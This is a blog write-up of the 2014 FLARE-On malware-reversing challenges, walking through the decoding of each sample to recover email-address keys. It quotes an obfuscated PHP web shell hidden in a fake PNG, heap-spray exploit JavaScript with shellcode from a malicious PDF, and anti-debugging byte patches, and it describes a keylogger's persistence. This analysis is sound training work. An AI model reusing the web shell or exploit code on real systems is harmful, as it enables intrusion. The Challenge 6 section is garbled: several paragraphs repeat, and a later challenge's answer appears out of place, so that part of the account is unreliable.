Busy under the pressure of releasing the new Dissecting the Hack book, the challenge went to the back of my mind until the 24th of July. I was facing a pretty hard-hitting bit of writer's block and frustration. I agreed to let myself have a break to do the challenge for one week before getting back to my commitments.
Although the challenge started in early July, it ran up until 15 September. There was an unspoken moratorium on answers/solutions while the challenge ran, but now that the samples are all freely available from their website, some are coming forth with how they completed them.
This is my story.
Challenge 1
The first challenge started out with downloading an executable from the flare-on.com website. I immediately threw it into IDA and started poking around, only to discover that it was just a dropper for the real challenge :) I let it do its thing, agreed to a EULA without reading it, and received the first challenge file:
File Name : Challenge1.exe File Size : 120,832 bytes MD5 : 66692c39aab3f8e7979b43f2a31c104f SHA1 : 5f7d1552383dc9de18758aa29c6b7e21ca172634 Fuzzy : 3072:vaL7nzo5UC2ShGACS3XzXl/ZPYHLy7argeZX:uUUC2SHjpurG Import Hash : f34d5f2d4577ed6d9ceec516c1f5a744 Compiled Time : Wed Jul 02 19:01:33 2014 UTC PE Sections (3) : Name Size MD5 .text 118,272 e4c64d5b55603ecef3562099317cad76 .rsrc 1,536 6adbd3818087d9be58766dccc3f5f2bd .reloc 512 34db3eafce34815286f13c2ea0e2da70 Magic : PE32 executable for MS Windows (GUI) Intel 80386 32-bit Mono/.Net assembly .NET Version : 2.0.0.0 SignSrch : offset num description [bits.endian.size] 0040df85 2875 libavcodec ff_mjpeg_val_ac_luminance [..162] 0040e05d 2876 libavcodec ff_mjpeg_val_ac_chrominance [..162]
Based on this output from the file, I can see first of all that it was built from .NET 2.0 (based on the mscorlib import). That'll be important later to determine what tool to analyze the file in; IDA Pro is not the most conducive tool for .NET applications.
At this point, let's run it and see what happens:
The image shows some happy little trees and a great, big "DECODE" button. Clicking this button changes the image thusly:
Without any clue of what to do with the challenge, or what I'm actually looking for, I open it up for analysis with Red Gate .NET Reflector.
Typically with static analysis on an unknown file, I start from a main() and work down. The equivalent is see here with InitializeComponent():
Notably, I see the decode button being drawn on the screen with button.text = "DECODE"; and a subroutine applied to this button with button.Click += new EventHandler(this.btnDecode_Click); My clue here is to hunt for this routine, btnDecode_Click, which shows:
Math is a good sign. Looking at this, I see three distinct string encoding routines, each producing their own string variable. The first is a definite byte-by-byte encoding, the second appears to be a byte-swap, and the third is a simple XOR. This final value is then applied to the this.lbl_title.Text.
From here, the easiest route was to simply copy the binary data out (Resources.dat_secret) and replicate the routines in Python:
str = str2 = str3 = '' data = "\xA1\xB5\x44\x84\x14\xE4\xA1\xB5\xD4\x70\xB4\x91\xB4\x70\xD4\x91\xE4\xC4\x96\xF4\x54\x84\xB5\xC4\x40\x64\x74\x70\xA4\x64\x44" print data for i in data: str += chr( ( (ord(i) >> 4) | (ord(i) << 4) & 240) ^ 0x29) print str for j in range(0, len(str)-1, 2):
str2 += str[j+1] + str[j] print str2 for k in str2: str3 += chr(ord(k) ^ 0x66) print str3
This resulted in the output of:
¦Dä¶Sí¦+p¦æ¦p+æS-û(Tä¦-@dtpñdD 3rmahg3rd.b0b.d0ge@flare-on.com r3amghr3.d0b.b0degf@alero-.noc m
The first round of encoding resulted in an email address. Cool! I poked around for a bit more and found no additional functionality... so... I email the address? Sent on 24 Jul 14 at 2123:
30 seconds later I receive an automated email with the second challenge. Oh, so that's how these are played :)
Challenge 2
Challenge 2 consisted of a ZIP with an HTML and a PNG image:
Path = C2.zip Type = zip Physical Size = 10758 Date Time Attr Size Compressed Name ------------------- ----- ------------ ------------ ------------------------ 2014-07-07 22:22:33 ....A 8375 2857 home.html 2014-07-07 21:30:25 D.... 0 0 img 2014-07-07 21:30:47 ....A 9560 7430 img\flare-on.png ------------------- ----- ------------ ------------ ------------------------ 17935 10287 2 files, 1 folders
I try to view the PNG and received an error:
Opening it up in a hex editor (and then a text editor) showed that there was no picture data, just a set of PHP code. I was actually disappointed by this. I was hoping it'd be PHP appended to a PNG to at least confuse the newbies, but this was very apparent.
The PHP code was a basic text obfuscation routine where two arrays were created to build new code. One array contained an alphabet of all possible characters used ($terms) and the second contained the actual sequence of the output data ($order). I copy/pasted the tables into a thrown-together Python script:
terms = ["M", "Z", "]", "p", "\\", "w", "f", "1", "v", "<", "a", "Q", "z", " ", "s", "m", "+", "E", "D", "g", "W", "\"", "q", "y", "T", "V", "n", "S", "X", ")", "9", "C", "P", "r", "&", "\'", "!", "x", "G", ":", "2", "~", "O", "h", "u", "U", "@", ";", "H", "3", "F", "6", "b", "L", ">", "^", ",", ".", "l", "$", "d", "`", "%", "N", "*", "[", "0", "}", "J", "-", "5", "_", "A", "=", "{", "k", "o", "7", "#", "i", "I", "Y", "(", "j", "/", "?", "K", "c", "B", "t", "R", "4", "8", "e", "|"] code = [59, 71, 73, 13, 35, 10, 20, 81, 76, 10, 28, 63, 12, 1, 28, 11, 76, 68, 50, 30, 11, 24, 7, 63, 45, 20, 23, 68, 87, 42, 24, 60, 87, 63, 18, 58, 87, 63, 18, 58, 87, 63, ... ... 4, 7, 91, 91, 4, 37, 51, 70, 21, 47, 93, 8, 10, 58, 82, 59, 71, 71, 71, 82, 59, 71, 71, 29, 29, 47] data = '' for i in code: data += terms[i] print data
Running this produced a second PHP script (carriage returns added for clarity):
$_= 'aWYoaXNzZXQoJF9QT1NUWyJcOTdcNDlcNDlcNjhceDRGXDg0XDExNlx4NjhcOTdceDc0XHg0NFx4NEZceDU0XHg2QVw5N1x4NzZceDYxXHgzNVx4NjNceDcyXDk3XHg3MFx4NDFcODRceDY2XHg2Q1w5N1x4NzJceDY1XHg0NFw2NVx4NTNcNzJcMTExXDExMFw2OFw3OVw4NFw5OVx4NkZceDZEIl0pKSB7IGV2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbIlw5N1w0OVx4MzFcNjhceDRGXHg1NFwxMTZcMTA0XHg2MVwxMTZceDQ0XDc5XHg1NFwxMDZcOTdcMTE4XDk3XDUzXHg2M1wxMTRceDYxXHg3MFw2NVw4NFwxMDJceDZDXHg2MVwxMTRcMTAxXHg0NFw2NVx4NTNcNzJcMTExXHg2RVx4NDRceDRGXDg0XDk5XHg2Rlx4NkQiXSkpOyB9'; $__='JGNvZGU9YmFzZTY0X2RlY29kZSgkXyk7ZXZhbCgkY29kZSk7'; $___="\x62\141\x73\145\x36\64\x5f\144\x65\143\x6f\144\x65"; eval($___($__));
Looking at the big block of data suggests that it is Base64, just based on its appearance. We see it executed by the obfuscated string of $___ which is a weird mixture of octal and hex bytes. By running that string through an online interpreter, we see that it is simply base64_decode:
First we Base64 decode the small block of data in $__ to receive:
$code=base64_decode($_);eval($code);
No surprises here. Now, the big block of data:
$_= if(isset($_POST["\\97\\49\\49\\68\\x4F\\84\\116\\x68\\97\\x74\\x44\\x4F\\x54\\x6A\\97\\x76\\x61\\x35\\x63\\x72\\97\\x70\\x41\\84\\x66\\x6C\\97\\x72\\x65\\x44\\65\\x53\\72\\111\\110\\68\\79\\84\\99\\x6F\\x6D"])) { eval(base64_decode($_POST["\\97\\49\\x31\\68\\x4F\\x54\\116\\104\\x61\\116\\x44\\79\\x54\\106\\97\\118\\97\\53\\x63\\114\\x61\\x70\\65\\84\\102\\x6C\\x61\\114\\101\\x44\\65\\x53\\72\\111\\x6E\\x44\\x4F\\84\\99\\x6F\\x6D"])); };
At this point, PHP is looking to see if an HTTP POST field holds a value and, if so, evals the Base64 decoded version of it. Like a very simple web shell. One issue is that the online interpreter doesn't like the double slashes, but that's an easy fix. Also, that these aren't octal values but actual ASCII decimal values for characters. Unsure of how to print those easily, I threw together a quick script to decode them:
data = r"\97\49\49\68\x4F\84\116\x68\97\x74\x44\x4F\x54\x6A\97\x76\x61\x35\x63\x72\97\x70\x41\84\x66\x6C\97\x72\x65\x44\65\x53\72\111\110\68\79\84\99\x6F\x6D" result = '' items = data.split('\\') for i in items: if i: if i[0] == 'x': result += chr(int(i[1:3], 16)) else: result += chr(int(i)) print result
Running this produced:
a11DOTthatDOTjava5crapATflareDASHonDOTcom (or: a11.that.java5crap@flare-on.com)
This was a pretty easy one that was done in 15 minutes. The email was shot off on 24 July 14 at 2138 and I received #3 immediately after.
Challenge 3
Challenge 3 was of a simple, tiny executable named such_evil:
File Name : such_evil File Size : 7,168 bytes MD5 : f015b845c2f85cd23271bc0babf2e963 SHA1 : f5d527908f363f6b1efad684532bf544a2d077ac Fuzzy : 96:FcVTXrxJsuqISnUitUlGTw9u6Q0H5TrgCV5E/a/mtVox:F4XMuqIitbAH5TP5kEOox Import Hash : 50f433a443bc36990996bb4d4dd484aa Compiled Time : Thu Jan 01 00:00:00 1970 UTC PE Sections (2) : Name Size MD5 .text 6,144 a75c2e2daad859328d31827f1318efd8 .data 512 f553d080b0d5ee70296bfd5aef252b79 Magic : PE32 executable for MS Windows (console) Intel 80386 32-bit
Opening it up for static analysis with IDA Pro showed that it wouldn't be possible. There is simply a large routine that writes new shellcode to memory, one byte at a time, and then calls it.
I dumped IDA and switched over to Immunity Debugger. I find its debugger much easier to use than IDA's (the latter of which I'm slowly learning to use).
By following the code, it shows that it begins to write it to memory at EBP-0x201. I went to that memory space, nulled it, and monitored the writing:
Once the data was all written, it simply LEA's EBP-0x201 into EAX, and CALL EAX:
Early on in this new routine, there is a FOR loop that XOR's data by 0x66. It decodes from that point in the shellcode forward through the remainder of the data, with an apparent string appearing at the beginning:
"and so it begins"
Additional text is also seen here: hus\00, hsaurhnopa. In understanding shellcode, these are attempts to push (0x68 "h") a string onto the stack in four-byte segments. And, in the next part of code, we see that's exactly what happened. This string ended up becoming an XOR key for the next round of decoding: "nopasaurus"
After decoding we see another block: "get ready to get nop'ed so damn hard in the paint". The paint? The pain? The ... I don't know.
More decoding, this time by a hardcoded XOR string of Gl0b (0x624F6C47 in reverse endian). Then an XOR by "omg is it almost over?!?" which results in ... an email address:
However, there's more code! By following the rest, we see the the next block contains the error alert window that was shown at the very beginning.
14 minutes after starting, an email was fired off to such.5h311010101@flare-on.com on 24 July 14 at 2152.
Challenge 4
Things are starting to pick up now. Challenge 4 is a PDF named "APT9001.pdf". Obviously a spoof on the APT1 report, I started to wonder if there was a key in this name. Like it's using Trojan 9002 ... minus one?
File Name : APT9001.pdf File Size : 21,284 bytes MD5 : f2bf6b87b5ab15a1889bddbe0be0903f SHA1 : 58c93841ee644a5d2f5062bb755c6b9477ec6c0b Fuzzy : 384:y58K1Qdl6W739kGHQN3kiAJdounFkltXw7iYR4hr3h9ihFjhVJVX5g/zd9Gq:F9gWtHQDyFyC7+d32jHX5y Magic : PDF document, version 1.5
Using Didier Steven's pdf-parser showed some items of interest:
brians-mbp:Tools bbaskin$ ./pdf-parser.py ~/FLARE/4/APT9001.pdf PDF Comment '%PDF-1.5\r\n' PDF Comment '%\xea\xbb\xc1\x9c\r\n' obj 1 0 Type: /Catalog Referencing: 2 0 R, 3 0 R, 5 0 R << /Type /Catalog /Outlines 2 0 R /Pages 3 0 R /OpenAction 5 0 R >> obj 5 0 Type: /Action Referencing: 6 0 R << /Type /Action /S /JavaScript /JS 6 0 R >> obj 6 0 Type: Referencing: Contains stream << /Length 6170 /Filter '[ \r\n /Fla#74eDe#63o#64#65 /AS#43IIHexD#65cod#65 ]' >>
Notably, Object 5 (obj 5 0) is an action page that loads Javascript from object 6 (/JS 6 0 R). So, we divert our attention to object 6 and see that the data is encoded with the routine obfuscated. In each name random characters are replaced with their hex values (#XX) but a visual look shows them as "FlateDecode" and "ASCIIHexDecode".
Targeting this object with pdf-parser dumps a block of JavaScript data that we need to work with:
brians-mbp:Tools bbaskin$ ./pdf-parser.py ~/FLARE/4/APT9001.pdf -o 6 -f obj 6 0 Type: Referencing: Contains stream << /Length 6170 /Filter '[ \r\n /Fla#74eDe#63o#64#65 /AS#43IIHexD#65cod#65 ]' >> var HdPN = ""; var zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf = ""; var IxTUQnOvHg = unescape("%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4 .. removed for brevity .. %u6f72%u6863%u7845%u7469%uff54%u2474%uff40%u2454%u5740%ud0ff"); var MPBPtdcBjTlpvyTYkSwgkrWhXL = ""; for (EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA=128;EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA>=0;--EvMRYMExyjbCXxMkAjebxXmNeLXvloPzEWhKA) MPBPtdcBjTlpvyTYkSwgkrWhXL += unescape("%ub32f%u3791"); ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv = MPBPtdcBjTlpvyTYkSwgkrWhXL + IxTUQnOvHg; OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY = unescape("%ub32f%u3791"); fJWhwERSDZtaZXlhcREfhZjCCVqFAPS = 20; fyVSaXfMFSHNnkWOnWtUtAgDLISbrBOKEdKhLhAvwtdijnaHA = fJWhwERSDZtaZXlhcREfhZjCCVqFAPS+ETXTtdYdVfCzWGSukgeMeucEqeXxPvOfTRBiv.length while (OqUWUVrfmYPMBTgnzLKaVHqyDzLRLWulhYMclwxdHrPlyslHTY.length ... bGtvKT = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length + 20 while (zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length < bGtvKT) zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf += zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf; Juphd = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, bGtvKT); QCZabMzxQiD = zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.substring(0, zNfykyBKUZpJbYxaihofpbKLkIDcRxYZWhcohxhunRGf.length-bGtvKT); while(QCZabMzxQiD.length+bGtvKT < 0x40000) QCZabMzxQiD = QCZabMzxQiD+QCZabMzxQiD+Juphd; FovEDIUWBLVcXkOWFAFtYRnPySjMblpAiQIpweE = new Array();
This is an ugly block of code (some lines were removed as they conflicted with Blogger formatting). There are a lot of long, randomly named variables, but this is of little consequence. Using Notepad++ I just find/replace all of them get get code that looks like this.
var _VAR2_ = ""; for (_VAR3_=128;_VAR3_>=0;--_VAR3_) _VAR2_ += unescape("%ub32f%u3791"); _VAR4_ = _VAR2_ + __CODE__; _VAR5_ = unescape("%ub32f%u3791"); _VAR6_ = 20; _VAR7_ = _VAR6_+_VAR4_.length while (_VAR5_.length<_VAR7_) _VAR5_+=_VAR5_; _VAR8_ = _VAR5_.substring(0, _VAR7_); _VAR9_ = _VAR5_.substring(0, _VAR5_.length-_VAR7_); while(_VAR9_.length+_VAR7_ < 0x40000) _VAR9_ = _VAR9_+_VAR9_+_VAR8_; _VAR11_ = new Array(); for (_VAR3_=0;_VAR3_<100;_VAR3_++) _VAR11_[_VAR3_] = _VAR9_ + _VAR4_; for (_VAR3_=142;_VAR3_>=0;--_VAR3_) _VAR1_ += unescape("%ub550%u0166"); _VAR12_ = _VAR1_.length + 20 while (_VAR1_.length < _VAR12_) _VAR1_ += _VAR1_; _VAR13_ = _VAR1_.substring(0, _VAR12_); _VAR10_ = _VAR1_.substring(0, _VAR1_.length-_VAR12_); while(_VAR10_.length+_VAR12_ < 0x40000) _VAR10_ = _VAR10_+_VAR10_+_VAR13_; _VAR11b_ = new Array(); for (_VAR3_=0;_VAR3_<125;_VAR3_++) _VAR11b_[_VAR3_] = _VAR10_ + _VAR1_;
Interesting ... but I don't care. This is all exploitation code; it doesn't do anything that we care about. Instead, we should look at the shellcode that is injected alongside the exploit:
var __CODE__ = unescape("%u72f9%u4649%u1525%u7f0d%u3d3c%ue084%ud62a%ue139%ua84a%u76b9%u9824%u7378%u7d71%u757f%u2076%u96d4%uba91%u1970%ub8f9%ue232%u467b%u9ba8%ufe01%uc7c6%ue3c1%u7e24%u437c%ue180%ub115%ub3b2%u4f66%u27b6%u9f3c ...
This is shellcode stored as escaped unicode. Notably, when stored this way, the bytes are swapped. For example, %u72f9 is actually 0xf972. If you attempt to just strip the %u and convert to hex, you'd have to swap every two bytes to get the correct value. Or, just use native JavaScript to do it for you. I did the former to get shellcode that had this:
Offset 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 00000000 F9 72 49 46 25 15 0D 7F 3C 3D 84 E0 2A D6 39 E1 ùrIF% <=„à*Ö9á ... 00000768 1C 03 F3 8B 14 8E 03 D3 52 33 FF 57 68 61 72 79 ó‹ Ž ÓR3ÿWhary 00000784 41 68 4C 69 62 72 68 4C 6F 61 64 54 53 FF D2 68 AhLibrhLoadTSÿÒh 00000800 33 32 01 01 66 89 7C 24 02 68 75 73 65 72 54 FF 32 f‰|$ huserTÿ 00000816 D0 68 6F 78 41 01 8B DF 88 5C 24 03 68 61 67 65 ÐhoxA ‹ßˆ\$ hage 00000832 42 68 4D 65 73 73 54 50 FF 54 24 2C 57 68 44 21 BhMessTPÿT$,WhD! 00000848 21 21 68 4F 57 4E 45 8B DC E8 00 00 00 00 8B 14 !!hOWNE‹Üè ‹ 00000864 24 81 72 0B 16 A3 FB 32 68 79 CE BE 32 81 72 17 $ r £û2hyξ2 r 00000880 AE 45 CF 48 68 C1 2B E1 2B 81 72 23 10 36 9F D2 ®EÏHhÁ+á+ r# 6ŸÒ
Just with visual analysis, I see "LoadLibraryA" pop out, as well as "MessageBoxA" and "OWNED!!!".
With this block of shellcode, I use shellcode2exe.py to wrap it into an executable and launch it in Immunity debugger. Notably, in execution, unsequenced DWORDs are XOR to form the parts of an email that is assembled to: wa1ch.d3m.spl01ts@flare-on.com.
This one took a good while longer than the previous ones. At 2348, almost two hours later after going down various rabbit holes of the exploit and fixing the PDF and putting my kids to sleep very late, I sent off the email... then promptly went to bed.
Challenge 5
Challenge #5 was waiting in my inbox when I woke up early the next morning, another executable:
File Name : 5get_it File Size : 101,376 bytes MD5 : eb4a4861a5d641402551dcfd6f2a4bfa SHA1 : d0716637a979d071f4c0e32e80393f3a55652aed Fuzzy : 1536:eHc4Y6O5rgKXNNMnwughXT4m1pKnm3dBdshDr45oQPPGRPTJT:qYv5M+NMwtTzCWPqh45eRPTJT Import Hash : a609e70126618238af613915d25abb82 Compiled Time : Thu Jul 03 22:01:47 2014 UTC PE Sections (4) : Name Size MD5 .text 75,776 744af5711d3ed547a1a607631e9d41ea .rdata 10,752 2d438c10143d8d363256b109982a281c .data 9,728 abb223f71d55ef5c6b378cd9d968f5e7 .reloc 4,096 19b1fca9179c9b60507bd0d0dce88d36 Magic : PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit SignSrch : offset num description [bits.endian.size] 1000abca 1299 classical random incrementer 0x343FD 0x269EC3 [32.le.8&] 10016482 2545 anti-debug: IsDebuggerPresent [..17]
Notably, this file was flagged by 'file' as a DLL, but failed all of my peutils DLL scraping routines because:
AttributeError: PE instance has no attribute 'DIRECTORY_ENTRY_EXPORT'
I load it into IDA Pro and start with DLLMain():
By some basic analysis, the sample first determines if HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost is set and, if not, copies itself to C:\Windows\System32\svchost.dll and entrenches in the registry there as "c:\windows\system32\rundll32.exe c:\windows\system32\svchost.dll". Overall, pretty common functionality for a lot of malware. Following the code flow, I see a clear sign of a very basic keylogger. There is an API call to passively retrieve keystrokes from the buffer (GetAsyncKeyState()) and then a large switch statement for most keys on the keyboard:
By following one of these routines, for the letter A, I see a lot of global boolean values being checked to eventually toggle a new one on or off. Just through deduction, I realize that the booleans being set to true (1) are only set within that respective keystroke and are checked in others, suggesting that some keys need to be typed before others for that key to be toggled on.
In essence, the program is keylogging and looking for a particular word or phrase to be typed in. With this known, I go about labeling each and every subroutine, and then each respective boolean value. This helps explain the labels in the screenshot above, but also showed that in many keystrokes there are no actions taken, suggesting that the malware doesn't care if they are pressed. After a series of naming, it definitely shows that there's a limited set of keys being logged:
With those set, you could attempt to trace through them keystrokes like a backwards choose-your-own-adventure series (because I always wanted to see how to get to the goriest deaths), but there was an easier way that didn't require running the malware. When you create global variables and constants in C it will group them together. And so by double clicking on any global boolean you can see it in the context of the rest of the global values. I ignored this at first, thinking that the author would obfuscate the series of values so that they wouldn't read as an email ... but I was wrong. They were in direct sequence and spelled out the email address (l0ggingdoturdot...):
When initially pulling out the email I noticed one issue. The email was l`gging.Ur.5tr0ke5. There shouldn't be an apostrophe there, so I checked my code again. When I started xref'ing the values to double check I realized that the apostrophe keystroke was used to set the letter "0".
Odd... regardless, I change the character and get the legitimate email: l0gging.Ur.5tr0ke5@flare-on.com
The email was sent off that morning of 25 July at 0923 after spending about 2 hours on it. Then, I went to work.
Challenge 6
At this point I notify my coworkers that I was starting on the challenge and learned that two were already on #6. However, we maintained the professional courtesy of not sharing with each other :)They warned me that #6 was told to be the most difficult challenge of the entire series, with every previous challenge just to separate the chaff. And, they weren't wrong.
File Name : e7bc5d2c0cf4480348f5504196561297 File Size : 1,221,064 bytes MD5 : e7bc5d2c0cf4480348f5504196561297 SHA1 : 7ff95920877af815c4b33da9a4f0c942fe0907d6 Fuzzy : 12288:AAgOYrVfqiJwPy4Yj7/fb358YegLauCC9yJawoguxK1wT2syIvj90NK8:/cVfqiJUyL73b358YegxCsKKwI7CJ Magic : ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, for GNU/Linux 2.6.24, stripped SignSrch : offset num description [bits.endian.size] 000f7945 2417 MBC2 [32.le.248&] 000f8320 173 CRC-1 [crc8.0x01 le rev int_min.256] 000f8320 171 CRC-1 [crc8.0x01 lenorev int_min.256] 000f863c 2418 MBC2 [32.be.248&] 000f90d4 3051 compression algorithm seen in the game DreamKiller [32.be.12&]
Nice! A 64-bit Linux ELF. I've had experience with only a handful of ELFs, previously doing a few Phalanx, Tiny Shell, ChikDOS, and a difficult sample for my RSA interview. The 64-bit proved a bit of a hurdle as it meant I couldn't decompile any of the functions (at the time I was using 6.5; 6.6 had just recently been introduced with that feature).
Challenge 6 is hard. It's tedious. There are no short cuts; you would simply have to methodically step through thousands of lines of code and trace variables carefully. However, everyone tried initially to shortcut it.
I first attempted a static analysis of the file and gave up within a few hours. There were 2400 routines, with a majority appearing similar to the one shown below:
This would require debugging to get anywhere, and I am not particularly fond of IDA Pro's debugger. I'm quite fond of Immunity/Olly and right clicking on arbitrary values to show them in hex, and to see comparisons live with actual address names instead of "data[ebp+410]", but I digress. There is no Immunity/Olly available for Linux, but there is Evan's Debugger (EDB). That afternoon I sat down and ran through the sample.
The first thing to note was that it required command line arguments, but didn't tell you how many or what they were.
At this point, I decide to force myself to go the Linux route. Both coworkers were comfortable with IDA, and one had already created a set of FLIRT signatures to identify all of the statically linked routines. After an hour of learning to do the same he noted that there were very few routines resolved, so I went back to just forcing my way through. Hitting too many issues with EDB, with just not enough comfort with it, I switched back to IDA Pro.
After passing this check the sample returned up to the main function and went down a large rabbit hole of subroutines that all looked similar to the beginning. I stepped through most of it, trying to follow the flow of data. After a few dozen were called I noticed a block of what looked like Base64 data being written to memory. However, it was written out of sequence with large portions of null data mixed in.
Let me stop to mention that at this point many hours have gone by. I had started on Friday afternoon, and this is now Sunday evening. This sample took a lot of time to debug properly and clear attention to where breakpoints should be placed. I neglected to do much of that, so there were many hours of wasted work. And there is a LOT of stepping to do.
E:\malware\FLARE\7>7_bruteforce.py
da7.f1are.finish.lin3@flare-on.com
The first thing to note was that it required command line arguments, but didn't tell you how many or what they were.
At this point, I decide to force myself to go the Linux route. Both coworkers were comfortable with IDA, and one had already created a set of FLIRT signatures to identify all of the statically linked routines. After an hour of learning to do the same he noted that there were very few routines resolved, so I went back to just forcing my way through. Hitting too many issues with EDB, with just not enough comfort with it, I switched back to IDA Pro.
I used the remote debugger within IDA Pro to run the sample. I created a new Xubuntu VM and placed the malware sample and the IDA remote debugger app on the desktop, networked the two VMs together, and kicked it off.
In debugging to determine how many I should have, I set multiple breakpoints along different routes to see which number of args would take me the farthest. As no calls were documented (via previous IDA FLIRT sigs), they had to be done by hand. That means determining what TerminateProcess(), printf(), strcmp(), CreateFileA(), etc are by sight. This took a long time but paid off. After spending hours following the flow of logic to see where it would crash, I hit upon the key to the first argument:
In the code above the sample checks the length of the first argument to make sure it's 10 bytes. It then XOR's the entire argument by 0x56 and checks the result against "bngcg`debd". Failing either causes a print of "bad" and TerminateProcess(). XOR'ing that value shows that arg1 must be set to "4815162342".
I ran back and ran the sample with that as the argument. Good news, no more bad! Bad news... it "froze".
This leads to another issue going on with this sample. It relies upon syscall() greatly for many of its functions, sort of as a consolidated API for multiple functions, depending on what value you push to it, similar to network RPC. However, it took some time to realize that 64-bit Linux syscall() values were not the same as 32-bit. I eventually used this site as a resource: Linux System Call Table for x86_64
In the code above the sample checks the length of the first argument to make sure it's 10 bytes. It then XOR's the entire argument by 0x56 and checks the result against "bngcg`debd". Failing either causes a print of "bad" and TerminateProcess(). XOR'ing that value shows that arg1 must be set to "4815162342".
I ran back and ran the sample with that as the argument. Good news, no more bad! Bad news... it "froze".
This leads to another issue going on with this sample. It relies upon syscall() greatly for many of its functions, sort of as a consolidated API for multiple functions, depending on what value you push to it, similar to network RPC. However, it took some time to realize that 64-bit Linux syscall() values were not the same as 32-bit. I eventually used this site as a resource: Linux System Call Table for x86_64
The sample uses syscalls to throw a few wrenches at you. First, it makes a call to sys_ptrace to check for a debugger. It then later (after verifying the first arg) calls sys_nanosleep to enter deep sleeps before further execution.
The direct way around this was to just patch the bytes with a hex editor in the sample and reload the binary.
The direct way around this was to just patch the bytes with a hex editor in the sample and reload the binary.
PATCH syscall 101 (ptrace?)
OLD: E8 9A 50 05 00 48 C1 E8 3F 84 C0 74 14
NEW: E8 9A 50 05 00 48 C1 E8 3F 84 C0 EB 14
PATCH syscall 35 (sleep?)
.text:0000000000473D49 B8 23 00 00 00 mov eax, 35 ; sys nanosleep
.text:0000000000473D4E 0F 05 syscall
OLD: B8 23 00 00 00 0F 05
NEW: 90 90 90 90 90 90 90
PATCH syscall 35 (sleep?)
.text:0000000000473D6A B8 23 00 00 00 mov eax, 35 ; sys nanosleep
.text:0000000000473D6F 0F 05 syscall
OLD: B8 23 00 00 00 0F 05
NEW: 90 90 90 90 90 90 90
After passing this check the sample returned up to the main function and went down a large rabbit hole of subroutines that all looked similar to the beginning. I stepped through most of it, trying to follow the flow of data. After a few dozen were called I noticed a block of what looked like Base64 data being written to memory. However, it was written out of sequence with large portions of null data mixed in.
Let me stop to mention that at this point many hours have gone by. I had started on Friday afternoon, and this is now Sunday evening. This sample took a lot of time to debug properly and clear attention to where breakpoints should be placed. I neglected to do much of that, so there were many hours of wasted work. And there is a LOT of stepping to do.
It is now Monday. Eventually, I see an anonymous-looking subroutine call another, which called another, and another, all of which caused the program to stop if I stepped over them. At this point I was no longer following the data, but sit hitting stepping until I saw interesting instructions... and then I saw call rdx. Too late, I had F8'd over it and the program stopped.
The day is growing long and I grow tired. I restarted and got to that point again and looked around. The large block of Base64 data was completed and was decoded in memory. The sample them called into that code for more instructions. Following this, I was disheartened to see the results. Over 30 individual encoding routines, each checking a respective character of command line arg2.
I quickly write up decoders for the first few in Python but then hit a limit with type casting in Python. C will let you do operations like (0x40 ^ 0xBB + 0xF1) and keep the result within a single byte. Python won't easily. Frustrated at the level of effort still ahead of me, I crash and go to bed.
I quickly write up decoders for the first few in Python but then hit a limit with type casting in Python. C will let you do operations like (0x40 ^ 0xBB + 0xF1) and keep the result within a single byte. Python won't easily. Frustrated at the level of effort still ahead of me, I crash and go to bed.
However, I instead lay in bed staring at the ceiling thinking this over, then quickly get up and run back to the basement. There was an incredibly easy way to do this! But... I didn't find it. I found a harder way, but still easier than re-writing each routine. Too tired to even spin up my VMs, I just ran Ollydbg from my host, tapped into random memory space, and hand-transcribed the operations in reverse:
Now THAT is ghetto reversing ...
Slowly the letters worked their way out and, at 00:26 on 29 July, I had the answer of l1nhax.hurt.u5.a1l@flare-on.com. Four and a half days of analysis ... I submit and crash in bed.
Challenge 7
This is it, the final challenge. I had two days left to wrap this up, and I quickly woke up to jump at it.
File Name : a954bde7092791b06385a9617ba85415 File Size : 195,584 bytes MD5 : a954bde7092791b06385a9617ba85415 SHA1 : edb86bfa4d9272bac264dacc68ba1e8fa8878793 Fuzzy : 3072:8biJ9nQgBfhfyBmr1UrjqvYdCVMi+z8HUrmv0UPBn/sNAc6n0OcGh6IVlo:8kQg7Amr1UfrCWZ881UPpsGY7GfP Import Hash : e1a627890bc24cc28061ac3baf4662fe Compiled Time : Sun Jul 06 22:05:19 2014 UTC PE Sections (5) : Name Size MD5 .text 52,224 ab6c9a52eaf1b3b59c115abc63f1a80b .rdata 12,800 40b19e50cb9c3dbc60d3c243823de929 .data 123,392 322a18069e4bc7af15c1f7c025a61bbc .rsrc 512 c9363b5b6ba262c2acc3d14a8d930c07 .reloc 5,632 ced1665f50bf5ac984eb759ef096f05f Magic : PE32 executable for MS Windows (console) Intel 80386 32-bit SignSrch : offset num description [bits.endian.size] 00410af0 2545 anti-debug: IsDebuggerPresent [..17] 004321b4 3032 PADDINGXXPADDING [..16]
Nothing out of the ordinary. I open the sample expecting horrendous amounts of encoding... and was surprised. The malware reversed very easily; there was a limited number of subroutines, the code was clean, and everything made sense. The challenge was a bit more insidious.
Inside the executable is an encoded executable. You can see it. As the program runs it performs various checks against the system, such as "is the system 64bit?". If it checks, it XOR decodes the data with one key. If it doesn't, it uses another key.
After a dozen checks, you have an executable that you can run. The problem is determining which code path will get you the final executable.
